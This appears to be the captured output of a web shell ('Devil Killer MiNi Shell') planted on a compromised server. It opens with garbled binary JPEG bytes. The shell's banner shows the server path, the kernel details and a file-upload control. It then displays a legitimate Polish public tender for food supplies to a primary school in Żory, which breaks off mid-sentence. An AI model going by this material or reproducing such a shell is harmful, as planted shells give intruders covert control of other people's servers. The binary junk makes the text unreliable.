JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241125/0061374501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i zakup artykułów spożywczych, warzyw i owoców, mrożonek, nabiału, mięsa i wędlin, drobiu, jaj do Szkoły Podstawowej nr 16 z Oddziałami Integracyjnymi im. Marii Konopnickiej w Żorach w 2025r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa nr 16 z Oddziałami Integracyjnymi im. Marii Konopnickiej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000862368</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Osińska 50</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żory</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324345444</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sp16zory@sp16.zory.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sp16.zory.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i zakup artykułów spożywczych, warzyw i owoców, mrożonek, nabiału, mięsa i wędlin, drobiu, jaj do Szkoły Podstawowej nr 16 z Oddziałami Integracyjnymi im. Marii Konopnickiej w Żorach w 2025r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-37693b95-fceb-4d90-84dc-862ee50882aa</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00613745</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00081471/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa artykułów spożywczych, warzyw i owoców, mrożonek, nabiału, mięsa i wędlin, drobiu, pieczywa, jaj do Szkoły Podstawowej nr 16 z Oddziałami Integracyjnymi im. M. Konopnickiej w Żorach w 2025r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-37693b95-fceb-4d90-84dc-862ee50882aa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl <br/>2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu Wykonawca na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz w zakładce &#34;Centrum Pomocy&#34;</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku &#34;Dokument stanowiący tajemnicę przedsiębiorstwa&#34;.<br/>2.Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce &#34;Formularze&#34; (&#34;Formularze do komunikacji&#34;). Za pośrednictwem &#34;Formularzy do komunikacji&#34; odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk &#34;dodaj załącznik&#34;). W przypadku załączników, które są zgodne z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawców wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>3. Możliwość korzystania w postępowaniu z &#34;Formularzy do komunikacji&#34; w pełnym zakresie wymaga posiadania konta &#34;Wykonawcy&#34; na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z &#34;Formularzy do komunikacji&#34; służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>4.Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce &#34;Komunikacja&#34;,<br/>5.Maksymalny rozmiar plików przesyłanych za pośrednictwem &#34;Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>6.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>7.W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce &#34;Zgłoś problem&#34;.<br/>8.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej sp16zory@sp16.zory.pl - nie dotyczy składania ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a)Administratorem Danych Osobowych jest Szkoła Podstawowa nr 16 w Żorach. Kontakt z Administratorem jest możliwy także za pomocą adresu mailowego: sp16zory@sp16.zory.pl<br/>b)Inspektorem Ochrony Danych Osobowych jest Aleksandra Cnota-Mikołajec. Kontakt z inspektorem jest możliwy za pomocą adresów mailowych: aleksandra@eduodo.pl lub iod@eduodo.pl, <br/>c)Pani/Pana dane osobowe przetwarzane będą w celach związanych z postępowaniem o udzielenie zamówienia publicznego na podstawie art. 6 ust. 1 lit. c RODO w związku z realizacją obowiązku prawnego ciążącego na administratorze, wynikającego z ustawy z dnia 11.09.2019 r. – Pzp, a także na podstawie ustawy z dnia 27.08.2009 r. o finansach publicznych oraz ustawy z dnia 6.09.2001 r. o dostępie do informacji publicznej, <br/>d)Odbiorcami Pani/Pana danych osobowych mogą być: <br/>1)osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18, art. 19 i art. 74 ust. 1 ustawy z dnia 11.09.2019 r. – Pzp, <br/>2)organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa, <br/>3)inne podmioty, które na podstawie stosownych umów przetwarzają dane osobowe administratora, <br/>e)Pani/Pana dane osobowe przechowywane będą przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność. Jeśli czas trwania umowy przekracza cztery lata, zamawiający przechowuje umowę przez cały czas trwania umowy. <br/>f)Pani/Pana dane osobowe nie będą przekazywane do państw trzecich lub organizacji międzynarodowych, <br/>g)Ma Pani/Pan prawo żądania od Administratora: <br/>1)dostępu do swoich danych oraz otrzymania ich pierwszej kopii. Administrator dostarcza osobie, której dane dotyczą, kopię danych osobowych, które podlegają przetwarzaniu. Za wszelkie kolejne kopie, o które zwróci się osoba, której dane dotyczą, administrator może pobrać opłatę w rozsądnej wysokości, wynikającej z kosztów administracyjnych. <br/>Jeśli wykonanie wyżej wymienionego obowiązku wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji, mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu, <br/>2)do sprostowania swoich nieprawidłowych danych osobowych lub uzupełnienia swoich niekompletnych danych osobowych. Skorzystanie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu, ani zmianą postanowień umowy w zakresie niezgodnym z ustawą z dnia 11.09.2019 r. – Pzp. <br/>3)do usunięcia danych osobowych wyłącznie na podstawie art. 17 RODO, <br/>4)do ograniczenia przetwarzania danych osobowych na podstawie art. 18 RODO. Prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu, <br/>5)do wniesienia sprzeciwu wobec przetwarzania danych, jeśli nie występują prawnie uzasadnione podstawy przetwarzania i na zasadach opisanych w art. 21 RODO, <br/>6)do przenoszenia danych, zgodnie z art. 20 RODO,<br/>7)prawo do wniesienia skargi do organu nadzorczego, <br/>W celu skorzystania oraz uzyskania informacji dotyczących praw określonych powyżej (lit. a-g) należy skontaktować się z Administratorem lub z Inspektorem Danych Osobowych. <br/>h)Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego (Urząd Ochrony Danych Osobowych), gdy uzna Pani/Pan, że przetwarzanie Pani/Pana danych osobowych narusza przepisy ustawy o ochronie danych osobowych, <br/>i)Podanie przez Pani/Pana danych osobowych jest wymogiem ustawowym. Konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11.09.2019 r. – Pzp. <br/>j)Pani/Pana dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/1/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Artykuły spożywcze - 134 pozycji asortymentowych. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 108991,68 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Kupujący zastrzega sobie prawo do częściowej realizacji umowy, jednak niezrealizowana wartość umowy nie może być większa niż 35% wartości umowy, z zastrzeżeniem pkt 2 ppkt b.<br/>2. Ze względu na wystąpienie wyjątkowych okoliczności niezależnych od Zamawiającego np. stan epidemii, Kupujący zastrzega sobie prawo do zmiany ilości zamawianych artykułów spożywczych w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb, przy czym:<br/>a)wzrost zapotrzebowania nie będzie większy niż 30% wartości umowy;<br/>b)zmniejszenie zapotrzebowania nie może być mniejsze niż 65% wartości umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert:<br/>KRYTERIUM 1<br/><br/>- Cena (C) - 60% - Sposób przyznawania punktów w kryterium &#34;cena&#34;:<br/><br/> najniższa cena ofertowa<br/>C = --------------------------------------------------- x 100 x 60%<br/> cena ofertowa w ofercie ocenianej<br/><br/>W powyższym kryterium Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>C - ogólna liczba punktów przyznana w kryterium &#34;cena&#34;<br/><br/>KRYTERIUM 2<br/><br/>Warunki płatności<br/><br/>a) termin płatności od dnia doręczenia faktury - czternaście dni - 5 pkt.<br/>b) termin płatności od dnia doręczenia faktury – dwadzieścia jeden dni - 10 pkt.<br/>c) termin płatności od dnia doręczenia faktury - trzydzieści dni - 20 pkt.<br/><br/>P - ogólna liczba punktów przyznana w kryterium warunki płatności<br/><br/>KRYTERIUM 3<br/><br/>Termin wymiany wadliwego produktu<br/><br/>a) wymiana wadliwego produktu - do dwóch godzin od zgłoszenia - 10 pkt.<br/>b) wymiana wadliwego produktu - powyżej dwóch godzin od zgłoszenia - 0 pkt.<br/><br/>T - ogólna liczba punktów przyznana w kryterium termin wymiany wadliwego produktu<br/><br/>KRYTERIUM 4<br/><br/>Dostawa w okresach i godzinach wskazanych przez Zamawiającego – określone w załączniku nr 1 do SWZ<br/><br/>a) dostawa w okresach i godzinach wskazanych przez Zamawiającego – tak - 10 pkt.<br/>b) dostawa w okresach i godzinach wskazanych przez Zamawiającego – nie - 0 pkt.<br/><br/>D - ogólna liczba punktów przyznana w kryterium dostawa w okresach i godzinach wskazanych przez Zamawiającego<br/><br/>C+P+T+D = suma przyznanych punktów w kryteriach 1 - 4.<br/><br/>Suma przyznanych punktów w kryteriach 1 - 4 będzie sumowana.<br/>W przypadku, gdy Wykonawca w formularzu ofertowym nie wskaże któregoś z kryteriów Zamawiający przyjmie, iż za dane kryterium przyjmie wartość 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wymiany wadliwego produktu.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa w okresach i godzinach wskazanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Warzywa i owoce - 50 pozycji asortymentowych. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 57401,05 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03220000-9 - Warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Kupujący zastrzega sobie prawo do częściowej realizacji umowy, jednak zrealizowana wartość umowy nie może być większa niż 35% wartości umowy, z zastrzeżeniem pkt 2 ppkt b.<br/>2. Ze względu na wystąpienie wyjątkowych okoliczności niezależnych od Zamawiającego np. stan epidemii, Kupujący zastrzega sobie prawo do zmiany ilości zamawianych warzyw i owoców w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb, przy czym:<br/>a) wzrost zapotrzebowania nie może być większy niż 30% wartości umowy;<br/>zmniejszenie zapotrzebowania nie może być mniejsze niż 65% wartości umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert:<br/><br/>KRYTERIUM 1<br/><br/>- Cena (C) - 60% - Sposób przyznawania punktów w kryterium &#34;cena&#34;:<br/>najniższa cena ofertowa<br/>C = --------------------------------------------------- x 100 x 60%<br/>cena ofertowa w ofercie ocenianej<br/><br/>W powyższym kryterium Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>C - ogólna liczba punktów przyznana w kryterium &#34;cena&#34;<br/><br/>KRYTERIUM 2<br/><br/>Warunki płatności<br/><br/>a) termin płatności od dnia doręczenia faktury - czternaście dni - 5 pkt.<br/>b) termin płatności od dnia doręczenia faktury – dwadzieścia jeden dni - 10 pkt.<br/>c) termin płatności od dnia doręczenia faktury - trzydzieści dni - 20 pkt.<br/><br/>P - ogólna liczba punktów przyznana w kryterium warunki płatności<br/><br/>KRYTERIUM 3<br/><br/>Termin wymiany wadliwego produktu<br/><br/>a) wymiana wadliwego produktu - do dwóch godzin od zgłoszenia - 10 pkt.<br/>b) wymiana wadliwego produktu - powyżej dwóch godzin od zgłoszenia - 0 pkt.<br/><br/>T - ogólna liczba punktów przyznana w kryterium termin wymiany wadliwego produktu<br/><br/>KRYTERIUM 4<br/><br/>Dostawa w okresach i godzinach wskazanych przez Zamawiającego – określone w załączniku nr 1 do SWZ<br/><br/>a) dostawa w okresach i godzinach wskazanych przez Zamawiającego – tak - 10 pkt.<br/>b) dostawa w okresach i godzinach wskazanych przez Zamawiającego – nie - 0 pkt.<br/><br/>D - ogólna liczba punktów przyznana w kryterium dostawa w okresach i godzinach wskazanych przez Zamawiającego<br/><br/>C+P+T+D = suma przyznanych punktów w kryteriach 1 - 4.<br/><br/>Suma przyznanych punktów w kryteriach 1 - 4 będzie sumowana.<br/>W przypadku, gdy Wykonawca w formularzu ofertowym nie wskaże któregoś z kryteriów Zamawiający przyjmie, iż za dane kryterium przyjmie wartość 0 